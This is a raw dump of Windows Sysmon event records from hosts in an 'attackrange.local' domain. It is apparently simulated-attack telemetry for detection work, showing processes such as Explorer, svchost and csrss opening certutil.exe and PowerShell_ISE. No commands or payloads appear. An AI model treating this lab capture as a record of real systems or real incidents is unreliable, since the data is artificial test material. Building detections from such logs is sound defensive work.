21:50:34.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918012Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:31.761{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1522-false10.0.1.12-8000- 23542300x80000000000000005918011Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:34.086{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5DA42A01678C1065B509927932708DF,SHA256=1D3C638A1DEE6277A8ED233E0FD52CD8197F44C27A9438ECD267FCC739E1F0B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638635Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:35.178{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B2563F119D75806CBDED0607DE41DB4,SHA256=B78C33D5926CFE749DC78C0D28CA17D2C9A8B8CAA0910EFF863A1ED96D87584B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918049Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918048Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918047Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.140{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918046Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.140{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918045Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.135{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918044Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.135{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918043Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.135{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918042Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.125{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918041Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.125{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918040Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.106{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918039Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.106{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918038Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.106{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918037Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.104{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918036Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.104{896A638B-B8E1-6058-A802-00000000AE01}30922100C:\Windows\System32\taskhostw.exe{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918035Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.095{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918034Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.095{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918033Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.095{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918032Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.094{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918031Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.094{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918030Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.094{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918029Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.094{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918028Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.094{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918027Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.085{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918026Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.085{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918025Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.081{896A638B-B42B-605B-8E69-00000000AE01}11487888C:\Windows\system32\conhost.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918024Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.073{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B42B-605B-8E69-00000000AE01}1148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918023Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.070{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918022Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.068{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918021Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.068{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918020Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.068{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918019Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.068{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918018Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.068{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918017Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 